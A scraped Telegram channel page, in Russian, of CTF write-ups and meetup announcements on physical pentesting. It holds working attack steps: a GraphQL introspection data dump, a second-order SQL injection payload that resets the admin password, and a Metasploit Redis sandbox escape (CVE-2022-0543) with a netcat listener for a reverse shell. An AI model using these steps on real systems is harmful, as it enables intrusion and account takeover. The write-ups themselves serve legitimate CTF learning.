Райтапы по CTF{2026}
3.82K subscribers
264 photos
26 videos
88 files
458 links
☺️ Уютное сообщество для публикации райтапов с разных CTF соревнований и платформ

💬 Наш чатик: @writeup_chat

✍️ По любому вопросу можно писать мне: @freenameruuuu

Таски решать тут: @writeup_ctf_bot
Download Telegram
Всем спасибо, кто пришел на наш митап по физическому пентесту!

Надеюсь, вам понравилось!

Запись будет позже!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
Please open Telegram to view this post
VIEW IN TELEGRAM
41🔥224😱21
Райтапы по CTF{2026}
🚨 Митап по физическому пентесту — 29 января, Москва! Хочешь узнать, как выглядит полный цикл физического пентеста — от OSINT до проникновения в офис? Тогда тебе сюда 👇 📅 Когда: 29 января, 18:00–21:00 (МСК) 📍 Где: офис Solar на Никитском В программе —…
Если на этот пост, поставить огонечки и сердечки, то можно ускорить загрузку видео с митапа по физическому пентесту

А еще подпишитесь на 📺 RUTUBE, чтобы ничего не пропустить!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
1🔥681561
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE.

29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG Cable.

В плейлисте три доклада:

🔹 Егор Зайцев (@pro_pentest) — «Физический пентест: от OSINT до полной компрометации компании»
🔹 Андрей Зенин (Бастион) — «Физический пентест: этапы, практика и реальные кейсы»
🔹 Александр Хабибуллин (CyberOK) — «O.MG Cable: доверие к USB обернулось атакой»

Если интересен реальный физический редтимминг, социальная инженерия и практические кейсы с полей — залетай смотреть.

👉 Плейлист тут:
https://rutube.ru/plst/1456882/

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
20
Райтапы по CTF{2026}
💥 Записали митап по физическому пентесту — теперь всё лежит на RUTUBE. 29 января мы собрались в офисе Solar в Москве и поговорили про полный цикл физического пентеста: от OSINT и подготовки легенды до проникновения в офис и использования железа вроде O.MG…
Друзья, я знаю, что вам не хватило времени задать свои вопросы Егору, и именно поэтому мы решили провести СТРИМ-поскриптум, где ответим на всё, что вас интересует!

Форма, куда можно отправить свой вопрос:
https://forms.yandex.ru/u/6984a1da90fa7b1a56545f8c/

На всякий случай — запись доклада для тех, кто ещё не посмотрел:
https://rutube.ru/video/a54900346f6b71186397e2e232839c18/

Стрим проведём 13 февраля — включайте уведомления, чтобы не пропустить!

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
11453
Forwarded from InfoSec VK Hub
Всем привет!

А вот и финальный разбор в нашей серии! Последний пазл, флаг за который дал целых 400 очков. Иногда самая простая ошибка — оставить introspection в GraphQL — становится очень дорогой...

Persik ICO Writeup
category: web, points: 400

Airdrop токена Persik уже прошёл, а вы - опоздали ... но сервис хранит больше данных, чем должен!
Достаньте любой eligible-адрес и заберите флаг
После подключения кошелька видно, что для проверки участвует ли адрес в airdrop'е отсылается GraphQL query checkAirdrop на эндпойнт /graphql. Увидим, что по этому пути нам доступен GraphiQL.


Проверим включена ли introspection:
query { __schema { types { name kind fields { name type { name kind } } } } }

Из схемы составим query getEligibleUsers и получим список список адресов участников airdrop'а:
query GetEligibleUsers { getEligibleUsers { address tokensClaimed airdropEligible } }

Выберем любой адрес и передадим его в checkAirdrop:
query CheckAirdrop($addr: String!) { checkAirdrop(address: $addr) { address tokensClaimed airdropEligible flag } }
И получим флаг:
{
  "data": {
    "checkAirdrop": {
      "address": "0x8ba1f109551bD432803012645aac136c22C19e00",
      "tokensClaimed": 3000,
      "airdropEligible": true,
      "flag": "vkctf{edd3417a9eb5c85b361d196e504b05a0}"
    }
  }
}

Опционально можно было использовать адрес администратора из admin query:
query AdminInfo { admin { secretKey vaultAddr } }


На этом серия разборов подходит к концу. Мы прошли путь от базовых уязвимостей до тонкостей GraphQL, где одна невыключенная настройка открыла доступ ко всей логике и данным сервиса. Этот таск — отличное напоминание: безопасность API часто ломается на самых простых вещах: забытых отладочных интерфейсах, излишней детализации ошибок или избыточных правах.

Предыдущие разборы серии:

1 часть
2 часть
3 часть

VK Security | Буст этому каналу

#разбор #CTF
94
Forwarded from DUCKERZ
🔥 DUCKERZ CTF 2026 – ПОЕХАЛИ!

Соревнование DUCKERZ CTF 2026 официально началось! Желаем всем участникам удачи и успешного решения задач.

👉 Участвовать 👈

🐥Формат task-based
🐥Команды до 5 человек
🐥С 12:00 7 февраля по 12:00 8 февраля (МСК)
🐥Пример флага: DUCKERZ{c7f_b3g1n5}
🐥Бот поддержки: @duckerz_ctf_bot

🐥 Канал | 🐥 Чат | 🐥 Платформа | 🐥 Регистрация
Please open Telegram to view this post
VIEW IN TELEGRAM
64😱1
#duckerzctf2026 #Web

🏥 Клиника [клик]

Уязвимость Second-Order SQL Injection в обработчике /update-password. Хотя регистрация и вход используют параметризованные запросы, имя пользователя из сессии подставляется в SQL-запрос обновления пароля через обычную шаблонную строку.

Это позволяет использовать «отравленный» логин для атаки на базу данных. Регистрируем аккаунт с пейлоадом в качестве имени пользователя:
admin' --


После входа под этим аккаунтом значение попадает в сессию. При смене пароля в настройках профиля сервер выполнит инъекцию: кавычка закроет поле username, а символы -- закомментируют остаток оригинального запроса.

В результате SQL-запрос изменит пароль не нам, а администратору:
UPDATE users SET password = '[hash]' WHERE username = 'admin' --'


Заходим под admin с новым паролем и забираем флаг в панели управления.

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
9
#duckerzctf2026 #Misc

Редиска [клик]

Flask-приложение с Redis. Имитация старой системы "Enterprise Logic Pro 2000". Сразу обращаем внимание на версию Redis, используемую на сервере. Это Redis 5.0.7. Он не защищен паролем (requirepass пустой), что позволяет любому пользователю отправлять команды без аутентификации, но флага там нет.

Эта версия Redis уязвима к CVE-2022-0543. Это критическая RCE-уязвимость в Redis для Debian и Ubuntu, позволяющая выполнить произвольный код на сервере через обход ограничений Lua-песочницы.

msfconsole
use exploit/linux/redis/redis_debian_sandbox_escape


На сервере с белым IP открываем listener на 4444 порту
nc -lvnp 4444


set RHOSTS 94.19.79.169
set RPORT 20004
unset PASSWORD
set LHOST 45.140.19.200
set LUA_LIB /usr/lib/x86_64-linux-gnu/liblua5.1.so.0
set ForceExploit true


Получаем rev-shell на тачке с Redis. Флаг находится в корне
cat ../../flag.txt

💬 Канал & Чат | 📺 RUTUBE | 📺 YouTube
Please open Telegram to view this post
VIEW IN TELEGRAM
51